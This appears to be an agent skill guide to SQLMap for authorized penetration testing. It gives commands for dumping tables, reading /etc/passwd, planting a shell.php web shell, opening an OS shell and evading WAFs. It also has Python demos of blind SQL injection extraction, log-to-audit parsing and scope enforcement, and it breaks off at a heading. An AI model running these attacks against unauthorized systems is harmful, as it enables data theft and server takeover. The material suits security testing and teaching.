webapp-sqlmap
Automated SQL injection detection and exploitation tool for web application security testing. Use when: (1) Testing web applications for SQL injection vulnerabilities in authorized assessments, (2) Exploiting SQL injection flaws to demonstrate impact, (3) Extracting database information for security validation, (4) Bypassing authentication mechanisms through SQL injection, (5) Identifying vulnerable parameters in web requests, (6) Automating database enumeration and data extraction.
What this skill does
# SQLMap - Automated SQL Injection Tool
## Overview
SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities. This skill covers authorized security testing including vulnerability detection, database enumeration, data extraction, and authentication bypass.
**IMPORTANT**: SQL injection exploitation is invasive and can corrupt data. Only use SQLMap with proper written authorization on systems you own or have explicit permission to test.
## Quick Start
Basic SQL injection detection:
```bash
# Test single parameter
sqlmap -u "http://example.com/page?id=1"
# Test with POST data
sqlmap -u "http://example.com/login" --data="username=admin&password=test"
# Test from saved request file
sqlmap -r request.txt
# Detect and enumerate databases
sqlmap -u "http://example.com/page?id=1" --dbs
```
## Core Workflow
### SQL Injection Testing Workflow
Progress:
[ ] 1. Verify authorization for web application testing
[ ] 2. Identify potential injection points
[ ] 3. Detect SQL injection vulnerabilities
[ ] 4. Determine DBMS type and version
[ ] 5. Enumerate databases and tables
[ ] 6. Extract sensitive data (if authorized)
[ ] 7. Document findings with remediation guidance
[ ] 8. Clean up any test artifacts
Work through each step systematically. Check off completed items.
### 1. Authorization Verification
**CRITICAL**: Before any SQL injection testing:
- Confirm written authorization from application owner
- Verify scope includes web application security testing
- Understand data protection and handling requirements
- Document allowed testing windows
- Confirm backup and rollback procedures
### 2. Target Identification
Identify potential SQL injection points:
**GET Parameters**:
```bash
# Single URL with parameter
sqlmap -u "http://example.com/product?id=1"
# Multiple parameters
sqlmap -u "http://example.com/search?query=test&category=all&sort=name"
# Test all parameters
sqlmap -u "http://example.com/page?id=1&name=test" --level=5 --risk=3   # all GET/POST parameters are tested by default; --level=5 adds cookies and headers, --risk=3 adds OR-based and heavier payloads that can modify data
```
**POST Requests**:
```bash
# POST data directly
sqlmap -u "http://example.com/login" --data="user=admin&pass=test"
# From Burp Suite request file
sqlmap -r login_request.txt
# With additional headers
sqlmap -u "http://example.com/api" --data='{"user":"admin"}' --headers="Content-Type: application/json"
```
**Cookies and Headers**:
```bash
# Test cookies (cookie values are only tested at --level 2 or higher)
sqlmap -u "http://example.com/" --cookie="sessionid=abc123; role=user" --level=2
# Send custom headers (newline-separated); User-Agent and Referer are tested from --level 3, Host from --level 5
sqlmap -u "http://example.com/" --headers="X-Forwarded-For: 1.1.1.1\nUser-Agent: Test" --level=3
# Mark the exact injection point with * (works in cookies, headers, URL paths and POST data); here only the sessionid value is tested
sqlmap -u "http://example.com/" --cookie="sessionid=abc123*; role=user"
```
### 3. Detection and Fingerprinting
Detect SQL injection vulnerabilities:
```bash
# Basic detection
sqlmap -u "http://example.com/page?id=1"
# Aggressive testing (higher risk)
sqlmap -u "http://example.com/page?id=1" --level=5 --risk=3
# Specify technique
sqlmap -u "http://example.com/page?id=1" --technique=BEUSTQ
# Detect DBMS
sqlmap -u "http://example.com/page?id=1" --fingerprint
# Force specific DBMS
sqlmap -u "http://example.com/page?id=1" --dbms=mysql
```
**Injection Techniques**:
- **B**: Boolean-based blind
- **E**: Error-based
- **U**: UNION query-based
- **S**: Stacked queries
- **T**: Time-based blind
- **Q**: Inline queries
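To make concrete what technique **B** does, and why the "verify findings manually" advice in the security considerations matters, here is an added example that is not part of the sqlmap project or of the original page. It builds a throwaway SQLite database, models an injectable `?id=` handler next to its parameterized fix, runs the same `AND 1=1` / `AND 1=2` confirmation sqlmap uses, and then recovers a value one character at a time through the true/false oracle. The tables, the `admin` row and the `s3cret!` value are constructed for the demo and assume nothing about a real target.

```python
import sqlite3


# Constructed stand-in for the target's backend database (not a real target).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", [(1, "widget"), (2, "gadget")])
    conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cret!')")
    return conn


def product_vulnerable(conn: sqlite3.Connection, product_id: str):
    """Models the injectable handler behind ?id=...: the raw parameter is
    spliced into the SQL text, so whatever follows the number becomes SQL."""
    sql = f"SELECT name FROM products WHERE id = {product_id}"
    return conn.execute(sql).fetchone()


def product_safe(conn: sqlite3.Connection, product_id: str):
    """Hardened form of the same handler: the value is bound as a parameter.
    SQLite compares '1' to the INTEGER column as a number, while
    '1 AND 1=1' stays a string that matches no row."""
    return conn.execute("SELECT name FROM products WHERE id = ?", (product_id,)).fetchone()


def detect(handler, conn: sqlite3.Connection) -> bool:
    """sqlmap's technique B confirmation: a true and a false condition appended
    to a known-good value must produce different responses. If both look the
    same, the parameter is not boolean-injectable (or the finding is a false
    positive), which is the check to repeat by hand before reporting."""
    true_resp = handler(conn, "1 AND 1=1")
    false_resp = handler(conn, "1 AND 1=2")
    return true_resp is not None and false_resp is None


def oracle(handler, conn: sqlite3.Connection, condition: str) -> bool:
    """One blind question: does the record still come back when CONDITION is
    ANDed onto the query? True/False is all the attacker ever sees."""
    return handler(conn, f"1 AND ({condition})") is not None


def extract(handler, conn: sqlite3.Connection, subquery: str, max_len: int = 64) -> str:
    """Recover the result of SUBQUERY one character at a time with a binary
    search over the code point (0..127), the way a boolean-based blind dump
    works without the response ever containing the value itself."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(handler, conn, f"length(({subquery})) >= {pos}"):
            break  # ran past the end of the string
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(handler, conn, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    secret = "SELECT password FROM users WHERE username = 'admin'"
    for name, handler in (("vulnerable", product_vulnerable), ("parameterized", product_safe)):
        conn = make_db()
        # vulnerable: injectable=True extracted='s3cret!'
        # parameterized: injectable=False extracted=''
        print(f"{name}: injectable={detect(handler, conn)} extracted={extract(handler, conn, secret)!r}")
```

Each character costs about seven oracle requests, and a real target adds network latency on every one; that request volume is why `--delay` and the traffic log matter once sqlmap moves from detection to `--dump`.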
### 4. Database Enumeration
Enumerate database structure:
```bash
# List databases
sqlmap -u "http://example.com/page?id=1" --dbs
# Current database
sqlmap -u "http://example.com/page?id=1" --current-db
# List tables in database
sqlmap -u "http://example.com/page?id=1" -D database_name --tables
# List columns in table
sqlmap -u "http://example.com/page?id=1" -D database_name -T users --columns
# Database users
sqlmap -u "http://example.com/page?id=1" --users
# Database user privileges
sqlmap -u "http://example.com/page?id=1" --privileges
```
### 5. Data Extraction
Extract data from database (authorized only):
```bash
# Dump specific table
sqlmap -u "http://example.com/page?id=1" -D database_name -T users --dump
# Dump specific columns
sqlmap -u "http://example.com/page?id=1" -D database_name -T users -C username,password --dump
# Dump all databases (use with caution)
sqlmap -u "http://example.com/page?id=1" --dump-all
# Exclude system databases
sqlmap -u "http://example.com/page?id=1" --dump-all --exclude-sysdbs
# Search for specific data
sqlmap -u "http://example.com/page?id=1" -D database_name --search -C password
```
### 6. Advanced Exploitation
Advanced SQL injection techniques:
**File System Access**:
```bash
# Read file from server
sqlmap -u "http://example.com/page?id=1" --file-read="/etc/passwd"
# Write file to server (very invasive)
sqlmap -u "http://example.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"
```
**OS Command Execution** (needs a DBA-level database account; on MySQL and PostgreSQL sqlmap uploads a UDF through the file-write primitive, on MSSQL it uses xp_cmdshell, which requires stacked queries):
```bash
# Execute OS command
sqlmap -u "http://example.com/page?id=1" --os-cmd="whoami"
# Get OS shell
sqlmap -u "http://example.com/page?id=1" --os-shell
# Get SQL shell
sqlmap -u "http://example.com/page?id=1" --sql-shell
```
**HTTP Authentication** (reaching a target behind Basic/Digest/NTLM authentication; this is not SQL login bypass):
```bash
# Supply HTTP credentials so sqlmap can reach the injectable page (--auth-type needs --auth-cred)
sqlmap -u "http://example.com/page?id=1" --auth-type=Basic --auth-cred="admin:password"
```
**Authentication Bypass via SQL Injection**: there is no dedicated flag. Test the login form's own parameters (as in the POST examples above); if sqlmap reports `user` or `pass` as injectable, the query behind the login can be made to succeed without valid credentials, which you then confirm manually against the application.
```bash
# Test only the username parameter of the login form
sqlmap -u "http://example.com/login" --data="user=admin&pass=test" -p user
```
### 7. WAF Bypass and Evasion
Evade web application firewalls:
```bash
# Use tamper scripts
sqlmap -u "http://example.com/page?id=1" --tamper=space2comment
# Multiple tamper scripts
sqlmap -u "http://example.com/page?id=1" --tamper=space2comment,between
# Random User-Agent
sqlmap -u "http://example.com/page?id=1" --random-agent
# Custom User-Agent
sqlmap -u "http://example.com/page?id=1" --user-agent="Mozilla/5.0..."
# Add delay between requests
sqlmap -u "http://example.com/page?id=1" --delay=2
# Use proxy
sqlmap -u "http://example.com/page?id=1" --proxy="http://127.0.0.1:8080"
# Use Tor
sqlmap -u "http://example.com/page?id=1" --tor --check-tor
```
**Common Tamper Scripts**:
- `space2comment`: Replace space with comments
- `between`: Replace equals with BETWEEN
- `charencode`: URL encode characters
- `randomcase`: Random case for keywords
- `apostrophemask`: Replace apostrophe with its UTF-8 full-width counterpart
- `equaltolike`: Replace equals with LIKE
## Security Considerations
### Authorization & Legal Compliance
- **Written Permission**: Obtain explicit authorization for SQL injection testing
- **Data Protection**: Handle extracted data per engagement rules
- **Scope Boundaries**: Only test explicitly authorized applications
- **Backup Verification**: Ensure backups exist before invasive testing
- **Production Systems**: Extra caution on production databases
### Operational Security
- **Rate Limiting**: Use --delay (seconds between requests) and leave --threads at its default of 1 on fragile targets; time-based blind techniques are slow by design
- **Session Management**: Results are saved automatically per target, so re-running the same command resumes where it stopped; use --flush-session to discard cached results and retest, and -s to choose the session file
- **Logging**: Everything is written to the output directory (~/.local/share/sqlmap/output/ in current releases, ~/.sqlmap/output/ in older ones); override it with --output-dir, and add -t traffic.log to record every HTTP request and response for the engagement record
- **Data Sanitization**: Redact sensitive data from reports
- **False Positives**: Verify findings manually (replay the reported payload and its negated form and compare the responses)
### Audit Logging
Document all SQL injection testing:
- Target URLs and parameters tested
- Injection techniques successful
- Databases and tables accessed
- Data extracted (summary only, not full data)
- Commands executed
- Tamper scripts and evasion used
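The audit entries above can be produced from what sqlmap already writes: the "sqlmap identified the following injection point(s)" summary printed to the console and stored in `<output-dir>/<host>/log`. The following is an added example, not sqlmap's own code or part of the original page, that parses that summary into a per-target record with the parameter, the place, the technique letters from the list in section 3 and the exact payloads, and nothing from any dump. The sample log text is constructed in that format for the demo; the function and record names are assumptions.

```python
import json
import re

# sqlmap's Type strings mapped to the --technique letters used on this page.
TECHNIQUE_LETTERS = {
    "boolean-based blind": "B",
    "error-based": "E",
    "UNION query": "U",
    "stacked queries": "S",
    "time-based blind": "T",
    "inline query": "Q",
}

PARAM_RE = re.compile(r"^Parameter:\s+(?P<name>\S+)\s+\((?P<place>[^)]+)\)\s*$")
FIELD_RE = re.compile(r"^\s+(?P<key>Type|Title|Payload):\s+(?P<value>.*)$")
DBMS_RE = re.compile(r"^back-end DBMS:\s+(?P<dbms>.+)$")

# Constructed sample in the shape of sqlmap's console/log output; not a real target.
SAMPLE_LOG = """\
[12:00:01] [INFO] testing connection to the target URL
[12:00:07] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
sqlmap identified the following injection point(s) with a total of 57 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 4321=4321

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 8675 FROM (SELECT(SLEEP(5)))Abcd)
---
[12:00:09] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
"""


def parse_injection_points(text: str) -> dict:
    """Turn the injection-point summary into one entry per parameter, with one
    vector per 'Type:' block, plus the fingerprinted DBMS when present."""
    points, current, vector, dbms = [], None, None, None
    for line in text.splitlines():
        if (m := PARAM_RE.match(line)):
            current = {"parameter": m["name"], "place": m["place"], "vectors": []}
            vector = None
            points.append(current)
        elif (m := DBMS_RE.match(line)):
            dbms = m["dbms"].strip()
        elif current is not None and (m := FIELD_RE.match(line)):
            key, value = m["key"].lower(), m["value"].strip()
            if key == "type":
                vector = {"type": value, "technique": TECHNIQUE_LETTERS.get(value, "?")}
                current["vectors"].append(vector)
            elif vector is not None:
                vector[key] = value
        elif line.strip() == "---" and current is not None:
            current = None  # closing rule of the summary block
    return {"dbms": dbms, "injection_points": points}


def techniques_used(parsed: dict) -> str:
    """Letters of every technique that worked, in --technique order (e.g. 'BT')."""
    found = {v["technique"] for p in parsed["injection_points"] for v in p["vectors"]}
    return "".join(ch for ch in "BEUSTQ" if ch in found)


def audit_record(target: str, parsed: dict) -> dict:
    """The per-target entry for the engagement log: what was tested, what
    worked and the exact payloads, with no dumped data included."""
    return {
        "target": target,
        "dbms": parsed["dbms"],
        "techniques": techniques_used(parsed),
        "parameters": [
            {"name": p["parameter"], "place": p["place"],
             "payloads": [v.get("payload") for v in p["vectors"]]}
            for p in parsed["injection_points"]
        ],
    }


if __name__ == "__main__":
    record = audit_record("http://example.com/page?id=1", parse_injection_points(SAMPLE_LOG))
    print(json.dumps(record, indent=2))
```

Feed it the `log` file of each target directory after a run; the result is the "techniques successful" and "parameters tested" lines of the audit entry, ready to drop into the report without copying any extracted data.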
### Compliance
- **OWASP Top 10**: A03:2021 - Injection
- **CWE-89**: SQL Injection
- **MITRE ATT&CK**: T1190 (Exploit Public-Facing Application)
- **PCI-DSS**: 6.5.1 - Injection flaws (v3.2.1 numbering; requirement 6.2.4 in v4.0)
- **ISO 27001**: A.14.2 Security in development
## Common Patterns
### Pattern 1: Basic Vulnerability Assessment
```bash
# Detect vulnerability
sqlmap -u "http://example.com/page?id=1" --batch
# Enumerate databases
sqlmap -u "http://example.com/page?id=1" --dbs --batch
# Get current user and privileges
sqlmap -u "http://example.com/page?id=1" --current-user --current-db --is-dba --batch
```
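Pattern 1 is the step most often scripted, so here is an added wrapper, not part of sqlmap or of the original page, that enforces the authorization checks from section 1 before any command is assembled: the target host must be in the engagement scope, `--level`/`--risk` may not exceed what was agreed, and dumping or OS-level options are refused unless the scope allows them. It also pins the operational-security flags from this page (`--batch`, `--delay`, `--output-dir`, `-t` traffic log). The `SCOPE` dictionary, host names and function names are assumptions for the demo; if `sqlmap` is not on `PATH` the wrapper returns the argument list as a dry run.

```python
import shutil
import subprocess
from urllib.parse import urlparse

# Constructed engagement scope; in practice this mirrors the signed rules of
# engagement and is not edited by the tester mid-assessment.
SCOPE = {
    "allowed_hosts": {"staging.example.com"},
    "max_level": 3,
    "max_risk": 2,
    "allow_dump": False,   # --dump*, --os-*, --file-write, --sql-* need explicit sign-off
}

# Option prefixes that go beyond detection/enumeration into extraction or OS access.
INVASIVE_PREFIXES = ("--dump", "--os-", "--file-write", "--sql-shell", "--sql-query")


def in_scope(url: str, scope: dict = SCOPE) -> bool:
    """True only when the URL's host is explicitly authorized (no wildcards)."""
    host = urlparse(url).hostname or ""
    return host in scope["allowed_hosts"]


def build_sqlmap_args(url: str, scope: dict = SCOPE, level: int = 1, risk: int = 1,
                      extra=(), output_dir: str = "./sqlmap-out") -> list:
    """Assemble the sqlmap command line for Pattern 1 after the scope checks pass."""
    if not in_scope(url, scope):
        raise PermissionError(f"{url} is not in the authorized scope")
    if level > scope["max_level"] or risk > scope["max_risk"]:
        raise ValueError("requested --level/--risk exceeds what the engagement authorizes")
    if not scope["allow_dump"] and any(a.startswith(INVASIVE_PREFIXES) for a in extra):
        raise ValueError("data extraction or OS access is not authorized by the scope")
    args = [
        "sqlmap", "-u", url,
        "--batch",                          # never prompt; answers default
        f"--level={level}", f"--risk={risk}",
        "--delay=1",                        # one second between requests
        f"--output-dir={output_dir}",       # keep session, log and dumps with the engagement
        "-t", f"{output_dir}/traffic.log",  # full HTTP request/response record
    ]
    args.extend(extra)
    return args


def run_pattern_1(url: str, **kwargs) -> list:
    """Detect, then enumerate current user/db and DBA status (Pattern 1).
    Returns the argument list; executes sqlmap only when it is installed."""
    args = build_sqlmap_args(url, extra=["--current-user", "--current-db", "--is-dba"], **kwargs)
    if shutil.which("sqlmap") is not None:
        subprocess.run(args, check=False)
    return args


if __name__ == "__main__":
    print(" ".join(run_pattern_1("http://staging.example.com/page?id=1")))
    for bad in ("http://example.com/page?id=1",):
        try:
            build_sqlmap_args(bad)
        except PermissionError as exc:
            print("refused:", exc)
```

Enumeration options such as `--dbs` pass straight through; anything that starts with an invasive prefix is refused until `allow_dump` is flipped in the scope, which keeps step 6 of the workflow ("extract sensitive data, if authorized") an explicit decision rather than a default.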
### Pattern 2: Authentication Bypass Testing